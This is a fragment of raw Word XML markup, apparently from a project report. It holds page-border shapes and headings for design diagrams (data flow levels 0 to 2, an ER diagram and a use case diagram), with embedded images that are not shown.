                <v:shape id="Shape 49427" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49428" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4942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3C4B8D42" wp14:editId="39770042">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="39861" name="Group 3986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30" name="Shape 494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431" name="Shape 494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432" name="Shape 494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433" name="Shape 494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434" name="Shape 494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61" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49435" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49436" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49437" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49438" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 494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color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">DESIGN </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>METHODOLOGY :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B350B3B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC9F43" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">DFD LEVEL - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>0 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0276BC76" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2551B14E" wp14:editId="4A0BC232">
            <wp:extent cx="5873750" cy="2943225"/>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5873750" cy="2943225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2028BCBB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD1ED0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3E9FB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">DFD LEVEL - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64028D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4025CF3B" wp14:editId="058BE6D3">
            <wp:extent cx="5873750" cy="3721735"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5873750" cy="3721735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC28FD3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6322DEB4" wp14:editId="4BC6861E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40093" name="Group 4009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40" name="Shape 494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1" name="Shape 494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42" name="Shape 494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3" name="Shape 494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44" name="Shape 494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93" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49445" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49446" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49447" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49448" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4944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1A1407DD" wp14:editId="0D7E7065">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40094" name="Group 4009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50" name="Shape 494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1" name="Shape 494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52" name="Shape 494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3" name="Shape 494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54" name="Shape 494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94" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49455" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49456" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49457" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49458" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4945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7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">DFD LEVEL - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1458C3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="2050"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46AA94A1" wp14:editId="1914B856">
            <wp:extent cx="4571365" cy="4522470"/>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19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4571365" cy="4522470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DF2C7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AF07888" wp14:editId="064CE994">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="39883" name="Group 3988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60" name="Shape 494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61" name="Shape 494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62" name="Shape 494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63" name="Shape 494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64" name="Shape 494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83" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49465" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49466" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49467" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49468" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4946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4FA98305" wp14:editId="35142FC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="39887" name="Group 3988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70" name="Shape 494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1" name="Shape 494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72" name="Shape 494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3" name="Shape 494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74" name="Shape 494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87" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49475" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49476" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49477" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49478" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4947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7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ER </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>DIAGRAM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D779023" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6278F041" wp14:editId="54A5D217">
            <wp:extent cx="5873750" cy="795337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20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5873750" cy="7953375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE1725F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">USE CASE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>DIAGRAM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ED7077" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7879AC72" wp14:editId="6ED9876C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41786" name="Group 4178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80" name="Shape 494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81" name="Shape 494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82" name="Shape 494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83" name="Shape 494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84" name="Shape 494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786" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49485" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49486" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49487" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49488" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4948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2A2D3DBC" wp14:editId="24A626BF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41787" name="Group 4178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490" name="Shape 494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1" name="Shape 494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92" name="Shape 494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3" name="Shape 494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494" name="Shape 494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787" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49495" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
